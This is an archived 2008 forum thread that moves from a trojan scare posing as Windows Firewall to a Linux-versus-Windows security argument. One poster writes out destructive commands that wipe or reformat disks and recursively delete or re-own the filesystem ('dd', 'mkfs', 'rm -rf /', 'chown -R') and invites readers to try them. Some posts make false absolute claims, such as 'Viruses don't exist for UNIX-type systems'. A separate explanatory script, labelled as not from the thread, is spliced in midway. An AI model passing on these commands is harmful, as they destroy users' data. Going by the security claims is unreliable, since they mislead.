View Full Version : Windows Firewall Worth It?
VolatileShiftInPersona
2008-10-06, 14:50
I have Windows SP2, and my friend is like "Windows Firewall sucks, don't bother with it", but when I turn it off I sometimes get notifications with Windows Firewall saying it detected a Trojan sending information (even though I turned Windows Firewall off). When I click "Enable Protection" it just leads me to this page to buy Antivirus protection and doesn't enable my firewall at all.
Is it worth it in your opinion, Totse?
I also have AVG Antivirus, updated to the latest, and it hasn't detected any trojans. I regularly scan with Malwarebytes Anti-Malware and haven't detected any trojans either, so it's kind of suspicious that Windows Firewall would detect a trojan even though I obviously turned it off, and that it led me to a page to buy antivirus software even though I clicked "Enable Protection".
oddballz194
2008-10-06, 15:22
You have trojans, and your software isn't detecting them. It's time to reformat and reinstall Windows, in my opinion. It's easier than going through your registry and filesystem to get rid of it.
Spybot Search and Destroy might detect and get rid of it, possibly.
I've never heard of Malwarebytes Anti-Malware, but there are a lot of "anti-malware" programs that are really trojans. I'll reserve judgment on that one unless I hear more about it.
Windows Firewall wouldn't try to get you to buy an antivirus or anti-malware, and it doesn't give any messages when turned off (although Windows Security Center will give a message periodically that the firewall is off to remind you).
Windows Firewall does suck; I recommend you get something like ZoneAlarm if you want something decent for free.
VolatileShiftInPersona
2008-10-06, 19:16
You have trojans, and your software isn't detecting them. It's time to reformat and reinstall Windows, in my opinion. It's easier than going through your registry and filesystem to get rid of it.
Spybot Search and Destroy might detect and get rid of it, possibly.
I've never heard of Malwarebytes Anti-Malware, but there are a lot of "anti-malware" programs that are really trojans. I'll reserve judgment on that one unless I hear more about it.
Windows Firewall wouldn't try to get you to buy an antivirus or anti-malware, and it doesn't give any messages when turned off (although Windows Security Center will give a message periodically that the firewall is off to remind you).
Windows Firewall does suck; I recommend you get something like ZoneAlarm if you want something decent for free.
Well, Malwarebytes was an antivirus program that http://www.bleepingcomputer.com/ told me to use to get rid of a particularly nasty trojan I had last month.
This trojan might be a leftover from that trojan attack I had last month, where in total I got rid of about 50 trojans.
VolatileShiftInPersona
2008-10-06, 19:57
Yeah, you were right oddballz, I did have trojans; about 100 of them.
Thankfully, Malwarebytes came in to save my computer again. This is one piece of freeware anti-malware/spyware software that is absolutely great; I would recommend it to anyone, and I know the people at bleepingcomputer do.
Prometheum
2008-10-06, 21:22
Glad to hear this is resolved, but seriously, why do people bother trying to secure windows?
Know how many trojans and virii I've gotten while running Gnu/Linux? None. And that's after wine'ing a few of them to see if they would.
dfgremnantsunleashed
2008-10-08, 13:29
Glad to hear this is resolved, but seriously, why do people bother trying to secure windows?
Know how many trojans and virii I've gotten while running Gnu/Linux? None. And that's after wine'ing a few of them to see if they would.
Know how many people prefer Linux here! (in pk)
0.2% (including me :()
But still I use Windows and it's more productive for me, but I would love to upgrade if I had a laptop.
OP, ESET NOD32 3.0 + Comodo Firewall
kenshiro_kid
2008-10-08, 16:06
Glad to hear this is resolved, but seriously, why do people bother trying to secure windows?
Know how many trojans and virii I've gotten while running Gnu/Linux? None. And that's after wine'ing a few of them to see if they would.
You make it sound like these viruses don't exist for these OSes.
#!/usr/bin/perl
system('rm -rf /')
Omg, a Linux "virus". Before saying you have no viruses, "virus" needs to be defined. If a virus can be defined as something that can be used to compromise other people's security, then Linux has tons of viruses; given its reputation as the "hacker OS", it's not "impossible" to hack into a Linux box.
This is largely something that can be attributed to a person's intelligence regarding their operating system. I have OS X 10.4, and I haven't got any viruses (although some might say no one wants to write a virus for Mac), but the point still stands: if you're a horrible person at securing your computer then you will get a virus. I don't care if you're running a fucking supercomputer. It's not the OS, it's the person running it.
dfgremnantsunleashed
2008-10-08, 16:22
It's not the OS, it's the person running it.
I must add that using Windows doesn't compromise you at all; common sense and a little bit of help from Sandboxie goes a long way in securing your system.
Also I test 10+ pieces of software a week and countless keygens as well, and so far I haven't been compromised in any way (except for that one time :( by my own mistake).
Prometheum
2008-10-09, 00:22
You make it sound like these viruses don't exist for these OSes.
#!/usr/bin/perl
system('rm -rf /')
Omg, a Linux "virus". Before saying you have no viruses, "virus" needs to be defined. If a virus can be defined as something that can be used to compromise other people's security, then Linux has tons of viruses; given its reputation as the "hacker OS", it's not "impossible" to hack into a Linux box.
Sorry Mr. Straw Man, but here's the output of that:
:~$ perl -e "system('rm -rf /');"
rm: cannot remove root directory `/'
Try that on Windows (replace the command with deltree c:\ or whatever's necessary). Until it encounters a locked file, it'll go merrily on its way.
Even if you had been smarter and not used root as the target (/*, for example) then it would have only removed files writeable to a user. If you have a competent backup script, that's a non-issue.
It is impossible for a virus to infect a Gnu or BSD system unless it is running as root. That in itself is a difficult task.
While it's possible to hack a Gnu/Linux box, it's damn hard, because Gnu/Linux is a real OS with real security. It is impossible to hack a Linux box, AFAIK. With no daemons to exploit and no local interface, it'd be pretty much impossible. You'd have to flag a filesystem as dirty and then put the exploit code somewhere so that it would exploit a FS driver; but probably it'd just die when it couldn't find fdisk.
Viruses don't exist for UNIX-type systems. There have been (afaik) two, and both of them were lab viruses.
This is largely something that can be attributed to a person's intelligence regarding their operating system. I have OS X 10.4, and I haven't got any viruses (although some might say no one wants to write a virus for Mac), but the point still stands: if you're a horrible person at securing your computer then you will get a virus. I don't care if you're running a fucking supercomputer. It's not the OS, it's the person running it.
If you're running OS X, it's next to impossible for you to get a virus. You need no antivirus, no firewall, no trojan scanners, nothing. So far, I've heard one friend tell me about an attempted virus: it asked to be run as root. So yes, the stupidity of the user is a factor, but there are a lot of stupid people that won't go to porn sites that ask to install shady codecs anyways.
An OS with real security will fail as gracefully as possible even in the event of a user shitting all over security. That's why on UNIX-type systems, the user can do nothing, and getting root is extremely hard.
To add to that, your virus won't proliferate, and thus, is pretty l4me.
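The claim above, that a recursive delete run as an ordinary user only removes what that user is allowed to remove while root is stopped by nothing, can be checked without touching a real system. The script below is an added example and is not code from the thread. It builds a throwaway tree under mktemp, takes write permission away from one directory to stand in for a root-owned one (unlinking a file needs write permission on the containing directory, not on the file), and runs rm -rf over the tree. It assumes a POSIX shell with GNU or BSD rm and mktemp; the protected directory survives only when the script is run as a non-root user, which is the point being made.

```shell
#!/bin/sh
# Added example (not from the thread): shows that an unprivileged
# "rm -rf" is bounded by directory write permission, while the same
# command run as root removes everything.

demo_unprivileged_rm() {
    tmp=$(mktemp -d) || return 2

    # writable/: an ordinary directory the user may modify.
    # protected/: stands in for a root-owned system directory.
    mkdir -p "$tmp/writable" "$tmp/protected"
    echo data > "$tmp/writable/gone"
    echo data > "$tmp/protected/keep"

    # rm needs write permission on the *directory* to unlink entries
    # in it, so dropping write on protected/ is what blocks deletion.
    chmod 555 "$tmp/protected"

    # Deliberately "$tmp"/* rather than "$tmp": this mirrors the
    # difference between "rm -rf /*" and "rm -rf /" discussed above
    # (GNU rm refuses "/" itself unless --no-preserve-root is given).
    # The failure on protected/ is expected for a non-root user.
    rm -rf "$tmp"/* 2>/dev/null || true

    if [ -e "$tmp/writable" ]; then
        result=writable_survived          # should never happen
    elif [ -f "$tmp/protected/keep" ]; then
        result=protected_survived         # non-root: permission held
    else
        result=everything_gone            # root: nothing held
    fi

    # Clean up the scratch tree (restore write so rm can finish).
    chmod 755 "$tmp/protected" 2>/dev/null || true
    rm -rf "$tmp"
    echo "$result"
}

# Run directly: prints protected_survived as a normal user,
# everything_gone as root.
[ "${0##*/}" = "demo_unprivileged_rm.sh" ] && demo_unprivileged_rm
```

Note that the protection here is a property of the permission model, not of rm: any tool that unlinks files hits the same check, which is why the earlier posts' "run it as root" caveat is the whole story.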
oddballz194
2008-10-09, 00:42
Viruses don't exist for UNIX-type systems. There have been (afaik) two, and both of them were lab viruses.
One Unix virus that was in the wild was the Morris worm ( http://en.wikipedia.org/wiki/Morris_worm ) that infected DEC VAX machines running BSD 3 and Sun 3 (BSD-based). It also had a hook that was portable enough to affect other machines, bringing them down (but not infecting as the main virus body could only operate on VAX).
This worm took down basically the entire Internet that existed at the time, due to a bug that caused it to spread much faster than intended.
That said, AFAIK there are not CURRENTLY any wild *nix viruses.
Prometheum
2008-10-09, 01:31
One Unix virus that was in the wild was the Morris worm ( http://en.wikipedia.org/wiki/Morris_worm ) that infected DEC VAX machines running BSD 3 and Sun 3 (BSD-based). It also had a hook that was portable enough to affect other machines, bringing them down (but not infecting as the main virus body could only operate on VAX).
This worm took down basically the entire Internet that existed at the time, due to a bug that caused it to spread much faster than intended.
That said, AFAIK there are not CURRENTLY any wild *nix viruses.
It isn't a virus! It's a worm!
Also, the "system diversity" at that point is wildly different to what there is now. That could only have happened then.
kenshiro_kid
2008-10-09, 01:38
Okay, well I wrote that in two seconds- so of course it wasn't really polished. Let's try something else then...
#!/usr/bin/perl
system('chmod -R 777 /');
sleep(2);
print "Deleting...\n";
system('rm -rf /');
run it as root.
DO I WIN!?!?!?!
Prometheum
2008-10-09, 02:05
Okay, well I wrote that in two seconds- so of course it wasn't really polished. Let's try something else then...
#!/usr/bin/perl
system('chmod -R 777 /');
sleep(2);
print "Deleting...\n";
system('rm -rf /');
run it as root.
DO I WIN!?!?!?!
No, because the system will still refuse to remove /. The sleep call is unnecessary, and will bloat your payload, along with the print statement. It has no way to propagate (again) and you have no entrance vector besides "hey guys run this as root".
kenshiro_kid
2008-10-09, 03:01
No, because the system will still refuse to remove /. The sleep call is unnecessary, and will bloat your payload, along with the print statement. It has no way to propagate (again) and you have no entrance vector besides "hey guys run this as root".
I'm a computer wizard. I'll propagate what I want >:3
http://i36.tinypic.com/2vdjtir.jpg
EDIT: Found some harmful commands, try whatever ones you want.
dd if=/dev/zero of=/dev/sda
chown -R null: /
mkfs.vfat /dev/sda
dd if=/dev/urandom of=/dev/sda
wget -H -r --level=0 -k -p http://www.google.com
Prometheum
2008-10-09, 04:52
I'm a computer wizard. I'll propagate what I want >:3
http://i36.tinypic.com/2vdjtir.jpg
EDIT: Found some harmful commands, try whatever ones you want.
dd if=/dev/zero of=/dev/sda
chown -R null: /
mkfs.vfat /dev/sda
dd if=/dev/urandom of=/dev/sda
wget -H -r --level=0 -k -p http://www.google.com
None of those will work on a system that isn't Ubuntu or has primarily IDE drives. For instance, on my gentoo box, those will all obliterate my first flash stick.
Except the wget one. I'm flummoxed. Can you explain that?
EDIT: And the chown, though that can be fixed by chown'ing everything back the way it was. Root always has full permissions to everything.
kenshiro_kid
2008-10-09, 16:06
None of those will work on a system that isn't Ubuntu or has primarily IDE drives. For instance, on my gentoo box, those will all obliterate my first flash stick.
Except the wget one. I'm flummoxed. Can you explain that?
EDIT: And the chown, though that can be fixed by chown'ing everything back the way it was. Root always has full permissions to everything.
I'm not completely sure about the wget one; I got all of these after asking 4chan's /g/ board how to screw up a Linux computer.
Although, I'm pretty sure it recursively tries to download Google's HTML page over and over, with some special options (-k and -p, whatever those do), and switch /sda to /hda or whatever your applicable hard drive is and you're in business.
Prometheum
2008-10-09, 21:17
I'm not completely sure about the wget one; I got all of these after asking 4chan's /g/ board how to screw up a Linux computer.
Although, I'm pretty sure it recursively tries to download Google's HTML page over and over, with some special options (-k and -p, whatever those do), and switch /sda to /hda or whatever your applicable hard drive is and you're in business.
Well actually, I think most of those will fail if it's mounted anyways.
And after reading the wget manual, I've realized that command will do nothing. It downloads google.com recursively spanning across hosts, but at level 0, so I don't think it'll download much. Also, that has a syntax error, as it sets the starting directory to http://google.com, leaving wget without a host.
This is what you get for trusting Torchan.
PirateJoe
2008-10-25, 03:25
I'm a computer wizard. I'll propagate what I want >:3
http://i36.tinypic.com/2vdjtir.jpg
EDIT: Found some harmful commands, try whatever ones you want.
dd if=/dev/zero of=/dev/sda
chown -R null: /
mkfs.vfat /dev/sda
dd if=/dev/urandom of=/dev/sda
wget -H -r --level=0 -k -p http://www.google.com
Harmful commands yes, but they still require root privileges (except the wget one).